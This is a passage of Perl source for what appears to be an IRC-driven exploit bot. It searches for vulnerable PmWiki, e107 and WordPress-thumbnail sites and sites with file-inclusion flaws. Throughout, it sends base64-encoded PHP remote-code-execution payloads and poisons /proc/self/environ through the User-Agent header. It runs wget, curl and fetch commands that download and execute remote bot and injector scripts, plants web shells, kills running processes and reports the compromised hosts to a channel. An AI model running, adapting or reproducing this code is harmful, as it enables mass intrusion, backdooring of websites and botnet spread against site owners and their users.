  1220.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/".md5_hex($shell).".php";
  1221.         my $dur = $url."wp-content/uploads/thumb-temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1222.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1223.  
  1224. sub tim_xplc2() {
  1225.         my($url,$mode,$chan,$site,$engine) = @_;
  1226.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/external_".md5_hex($shell).".php";
  1227.         my $dur = $url."wp-content/uploads/thumb-cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1228.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1229.                
  1230. sub tim_xpld2() {
  1231.         my($url,$mode,$chan,$site,$engine) = @_;
  1232.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/".md5_hex($shell).".php";
  1233.         my $dur = $url."wp-content/uploads/thumb-cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1234.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1235.  
  1236. ######################### PmWiki
  1237. sub PmWiki() {
  1238.         my ($chan,$bug,$dork,$engine) = @_;
  1239.     my $count = 0;
  1240.     my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  1241.     my $num = scalar(@list);
  1242.     if ($num > 0) {
  1243.         foreach my $site (@list) {
  1244.             $count++;
  1245.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$pmwilogo 12(4@0$engine12) 10==14F10=15I10=0N10=0I10=15S10=14H10== "); } }
  1246.             my $test = "http://".$site.$bug;
  1247.             my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1248.             my $html = &PmWiki_rce_query($test,$code);
  1249.             if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  1250.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1251.                     my $sys = $1;
  1252.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } ';
  1253.                     my $res = &PmWiki_rce_query($test,encode_base64($upload));
  1254.                     if ($res =~ /c0liSUKSESc0li/) {
  1255.                                                 &get_content("http://".$site."pb.php");
  1256.                                                 &msg("$chan","$pmwilogo 12(4@0$engine12)(4@8SHELL12)13 http://".$site."13h4rd.php 12(4@8".$sys."12)(4@0safemode-9OFF12) ");sleep(2);
  1257.                                         }
  1258.                     &PmWiki_spread_query($test);
  1259.                     sleep(2);
  1260.                 } exit; } sleep(2);
  1261.             }
  1262.             elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
  1263.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1264.                     my $sys = $1;
  1265.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); }';
  1266.                     my $res = &PmWiki_rce_query($test,encode_base64($upload));
  1267.                     if ($res =~ /c0liSUKSESc0li/) {
  1268.                                                 &get_content("http://".$site."pb.php");
  1269.                                                 &msg("$chan","$pmwilogo (4@0$engine12)(4@8SHELL12)13 http://".$site."13h4rd.php 12(4@8".$sys."12(4@0safemode-4ON12) ");sleep(2)
  1270.                                         }
  1271.                                 &PmWiki_spread_query($test);
  1272.                 sleep(2); } exit; }
  1273.             }
  1274.         }
  1275.     }
  1276. }
  1277.  
  1278. sub PmWiki_rce_query() {
  1279.     my $url = $_[0];
  1280.     my $code = $_[1];
  1281.         my $cmd = "eval(base64_decode(".$code."));include('".$injector."');";
  1282.     my $req = HTTP::Request->new(POST => $url);
  1283.     $req->content_type("application/x-www-form-urlencoded");
  1284.     $req->content("action=edit&post=save&n=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1285.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1286.     $ua->timeout(7);
  1287.     my $res = $ua->request($req);
  1288.     return $res->content;
  1289. }
  1290. sub PmWiki_spread_query() {
  1291.     my $url = $_[0];
  1292.     my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1293.     my $cmd = "eval(base64_decode(".$code."));include('".$injector."');";
  1294.         my $req = HTTP::Request->new(POST => $url);
  1295.     $req->content_type("application/x-www-form-urlencoded");
  1296.     $req->content("action=edit&post=save&n=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1297.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1298.     $ua->timeout(7);
  1299.     my $res = $ua->request($req);
  1300. }
  1301.  
  1302. ######################## LFD
  1303. sub lfd() {
  1304.         my ($chan,$bug,$dork,$engine) = @_;
  1305.     my $count = 0;
  1306.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfdlogo);
  1307.     my $num = scalar(@list);
  1308.     if ($num > 0) {
  1309.         foreach my $site (@list) {
  1310.             $count++;
  1311.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); } }
  1312.             my $test = "http://".$site.$bug.$lfdtest;
  1313.             my $vuln = "http://".$site."12".$bug."6".$lfdtest;
  1314.             my $html = &get_content($test);
  1315.             if ($html =~ /$lfdoutput/) {
  1316.                 &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy");
  1317.                 sleep(3);
  1318.             }
  1319.         }
  1320.     }
  1321. }
  1322. ######################## LFI
  1323. sub lfi() {
  1324.         my ($chan,$bug,$dork,$engine) = @_;
  1325.     my $count = 0;
  1326.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  1327.     my $num = scalar(@list);
  1328.     if ($num > 0) {
  1329.         foreach my $site (@list) {
  1330.             $count++;
  1331.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfilogo 12(4@0$engine12) 8==14F8=15I8=0N8=0I8=15S8=14H8== "); } }
  1332.              my $dirs = ("../../../../../../../../../../../../../../../../../../../../../../../..",
  1333.                                                 "../../../../../../../../../../../../../../../../../../../../../../..",
  1334.                                                 "../../../../../../../../../../../../../../../../../../../../../..",
  1335.                                                 "../../../../../../../../../../../../../../../../../../../../..",
  1336.                                                 "../../../../../../../../../../../../../../../../../../../..",
  1337.                                                 "../../../../../../../../../../../../../../../../../../..",
  1338.                                                 "../../../../../../../../../../../../../../../../../..",
  1339.                                                 "../../../../../../../../../../../../../../../../..",
  1340.                                                 "../../../../../../../../../../../../../../../..",
  1341.                                                 "../../../../../../../../../../../../../../..",
  1342.                                                 "../../../../../../../../../../../../../..",
  1343.                                                 "../../../../../../../../../../../../..",
  1344.                                                 "../../../../../../../../../../../..",
  1345.                                                 "../../../../../../../../../../..",
  1346.                                                 "../../../../../../../../../..",
  1347.                                                 "../../../../../../../../..",
  1348.                                                 "../../../../../../../..",
  1349.                                                 "../../../../../../..",
  1350.                                                 "../../../../../..",
  1351.                                                 "../../../../..",
  1352.                                                 "../../../..",
  1353.                                                 "../../..",
  1354.                                                 "../..",
  1355.                                                 "..");
  1356.                         foreach my $dir (@dirs) {              
  1357.                                 my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  1358.                                 my $vuln = "http://".$site."13".$bug.$dir."/proc/self/environ%0000";
  1359.                                 my $shell = "http://".$site."13".$bug.$dir."/tmp/ripper%0000";
  1360.                                 my $html = &get_content($test);
  1361.                                 if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
  1362.                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1363.                                                 my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$botshell.'","/tmp/ripper")) { echo "SUCCESS";@copy("'.$injector.'","/tmp/dev"); }';
  1364.                                                 my $res = lfi_env_query($test,encode_base64($code));
  1365.                                                 &lfi_spread_query($test);
  1366.                                                 &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000");
  1367.                                                 $res =~ s/\n//g;
  1368.                                                 if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
  1369.                                                         my $sys = $1;
  1370.                                                         $nob0dy = $2;
  1371.                                                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 ".$shell." 12(4@8".$sys."12)  $nob0dy");sleep(2);
  1372.                                                 }
  1373.                                                 elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
  1374.                                                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1375.                                                                 my $sys = $1;
  1376.                                                                 $nob0dy = $2;
  1377.                                                                 my $upload = 'passthru("killall -9 perl; killall -9 php; wget '.$injector.' -O /tmp/dev; fetch -O /tmp/dev '.$injector.'; cUrl -O /tmp/dev '.$injector.'; lynx -dump '.$injector.' /tmp/dev; GET '.$injector.'>/tmp/dev; lwp-download '.$injector.' /tmp/dev; wget '.$botshell.' -O /tmp/ripper; fetch -O /tmp/ripper '.$botshell.'; cUrl -O /tmp/ripper '.$botshell.'; lynx -dump '.$botshell.' /tmp/ripper; GET '.$botshell.'>/tmp/ripper; lwp-download '.$botshell.' /tmp/ripper*"); exec("killall -9 perl; killall -9 php; wget '.$injector.' -O /tmp/dev; fetch -O /tmp/dev '.$injector.'; cUrl -O /tmp/dev '.$injector.'; lynx -dump '.$injector.' /tmp/dev; GET '.$injector.'>/tmp/dev; lwp-download '.$injector.' /tmp/dev; wget '.$botshell.' -O /tmp/ripper; fetch -O /tmp/ripper '.$botshell.'; cUrl -O /tmp/ripper '.$botshell.'; lynx -dump '.$botshell.' /tmp/ripper; GET '.$botshell.'>/tmp/ripper; lwp-download '.$botshell.' /tmp/ripper*"); system("killall -9 perl; killall -9 php; wget '.$injector.' -O /tmp/dev; fetch -O /tmp/dev '.$injector.'; cUrl -O /tmp/dev '.$injector.'; lynx -dump '.$injector.' /tmp/dev; GET '.$injector.'>/tmp/dev; lwp-download '.$injector.' /tmp/dev; wget '.$botshell.' -O /tmp/ripper; fetch -O /tmp/ripper '.$botshell.'; cUrl -O /tmp/ripper '.$botshell.'; lynx -dump '.$botshell.' /tmp/ripper; GET '.$botshell.'>/tmp/ripper; lwp-download '.$botshell.' /tmp/ripper*"); shell_exec("killall -9 perl; killall -9 php; wget '.$injector.' -O /tmp/dev; fetch -O /tmp/dev '.$injector.'; cUrl -O /tmp/dev '.$injector.'; lynx -dump '.$injector.' /tmp/dev; GET '.$injector.'>/tmp/dev; lwp-download '.$injector.' /tmp/dev; wget '.$botshell.' -O /tmp/ripper; fetch -O /tmp/ripper '.$botshell.'; cUrl -O /tmp/ripper '.$botshell.'; lynx -dump '.$botshell.' /tmp/ripper; GET '.$botshell.'>/tmp/ripper; lwp-download '.$botshell.' /tmp/ripper*");';
  1378.                                                                 my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  1379.                                                                 my $check = &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000"); sleep(2);
  1380.                                                                 if ($check =~ /<b>ID:<\/b> 0wn3d<\/font><br>/) {
  1381.                                                                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 ".$shell." 12(4@8".$sys."12)  $nob0dy");sleep(2);
  1382.                                                                 }  
  1383.                                                                 else {
  1384.                                                                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@7SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)  $nob0dy");sleep(2);
  1385.                                                                 }
  1386.                                                         } exit; }
  1387.                                                 }
  1388.                                                 else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@9ENVIRON12)11 ".$vuln); }
  1389.                                         } exit; } sleep(2);
  1390.                                 }
  1391.                         }
  1392.         }
  1393.     }
  1394. }
  1395.  
  1396. sub lfi_env_query() {
  1397.     my $url = $_[0];
  1398.     my $code = $_[1];
  1399.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".$code."')); ?>");
  1400.     $ua->timeout(7);
  1401.     my $req = HTTP::Request->new(GET => $url);
  1402.     my $res = $ua->request($req);
  1403.     return $res->content;
  1404. }
  1405.  
  1406. sub lfi_spread_query() {
  1407.     my $url = $_[0];
  1408.     my $code = "ZXhlYygnY2QgL3RtcDsgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgbHdwLWRvd25sb2FkICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyB3Z2V0ICIuJGJvdGFrLiIgLU8gc2IudHh0OyBjaG1vZCA3NTUgc2IudHh0OyBwZXJsIHNiLnR4dDsgZmV0Y2ggLU8gc2IudHh0ICIuJGJvdGFrLiI7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBjVXJsIC1PIHNiLnR4dCAiLiRib3Rhay4iOyBjaG1vZCA3NTUgc2IudHh0OyBwZXJsIHNiLnR4dDsgbHlueCAtZHVtcCAiLiRib3Rhay4iIHNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IEdFVCAiLiRib3Rhay4iPnNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGx3cC1kb3dubG9hZCAiLiRib3Rhay4iIHNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQqJyk7IHNoZWxsX2V4ZWMoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgd2dldCAiLiRib3Rhay4iIC1PIHNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGZldGNoIC1PIHNiLnR4dCAiLiRib3Rhay4iOyBjaG1vZCA3NTUgc2IudHh0OyBwZXJsIHNiLnR4dDsgY1VybCAtTyBzYi50eHQgIi4kYm90YWsuIjsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGx5bnggLWR1bXAgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBHRVQgIi4kYm90YWsuIj5zYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBsd3AtZG93bmxvYWQgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0KicpOyBzeXN0ZW0oJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgd2dldCAiLiRib3Rhay4iIC1PIHNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGZldGNoIC1PIHNiLnR4dCAiLiRib3Rhay4iOyBjaG1vZCA3NTUgc2IudHh0OyBwZXJsIHNiLnR4dDsgY1VybCAtTyBzYi50eHQgIi4kYm90YWsuIjsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGx5bnggLWR1bXAgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBHRVQgIi4kYm90YWsuIj5zYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBsd3AtZG93bmxvYWQgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0KicpOyAgcGFzc3RocnUoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgd2dldCAiLiRib3Rhay4iIC1PIHNiLnR4dDsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGZldGNoIC1PIHNiLnR4dCAiLiRib3Rhay4iOyBjaG1vZCA3NTUgc2IudHh0OyBwZXJsIHNiLnR4dDsgY1VybCAtTyBzYi50eHQgIi4kYm90YWsuIjsgY2htb2QgNzU1IHNiLnR4dDsgcGVybCBzYi50eHQ7IGx5bnggLWR1bXAgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBHRVQgIi4kYm90YWsuIj5zYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0OyBsd3AtZG93bmxvYWQgIi4kYm90YWsuIiBzYi50eHQ7IGNobW9kIDc1NSBzYi50eHQ7IHBlcmwgc2IudHh0KicpOw==";
  1409.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".encode_base64($code)."')); ?>");
  1410.     $ua->timeout(7);
  1411.     my $req = HTTP::Request->new(GET => $url);
  1412.     my $res = $ua->request($req);
  1413. }
  1414.  
  1415. ######################## e107
  1416. sub e107() {
  1417.         my ($chan,$bug,$dork,$engine) = @_;
  1418.     my $count = 0;
  1419.     my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  1420.     my $num = scalar(@list);
  1421.     if ($num > 0) {
  1422.         foreach my $site (@list) {
  1423.             $count++;
  1424.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$e107logo 12(4@0$engine12) 10==14F10=15I10=0N10=0I10=15S10=14H10== "); } }
  1425.             my $test = "http://".$site.$bug;
  1426.             my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1427.             my $html = &e107_rce_query($test,$code);
  1428.             if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  1429.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1430.                     my $sys = $1;
  1431.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");}eval(include("'.$injector.'"));';
  1432.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1433.                     if ($res =~ /c0liSUKSESc0li/) {
  1434.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1435.                                         }
  1436.                     elsif ($res =~ /stun_dthem/) {
  1437.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1438.                                         }
  1439.                     elsif ($res =~ /stun_dplug/) {
  1440.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1441.                                         }
  1442.                     elsif ($res =~ /stun_dima/) {
  1443.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1444.                                         }
  1445.                     else {
  1446.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-9OFF12) ");sleep(2);
  1447.                                                 my $dor = "http://".$site."h4rd.php";
  1448.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1449.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1450.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1451.                                                 }
  1452.                                         }
  1453.                     &e107_spread_query($test);
  1454.                     sleep(2);
  1455.                 } exit; } sleep(2);
  1456.             }
  1457.             elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
  1458.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1459.                     my $sys = $1;
  1460.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");}eval(include("'.$injector.'"));';
  1461.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1462.                     if ($res =~ /c0liSUKSESc0li/) {
  1463.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1464.                                         }
  1465.                     elsif ($res =~ /stun_dthem/) {
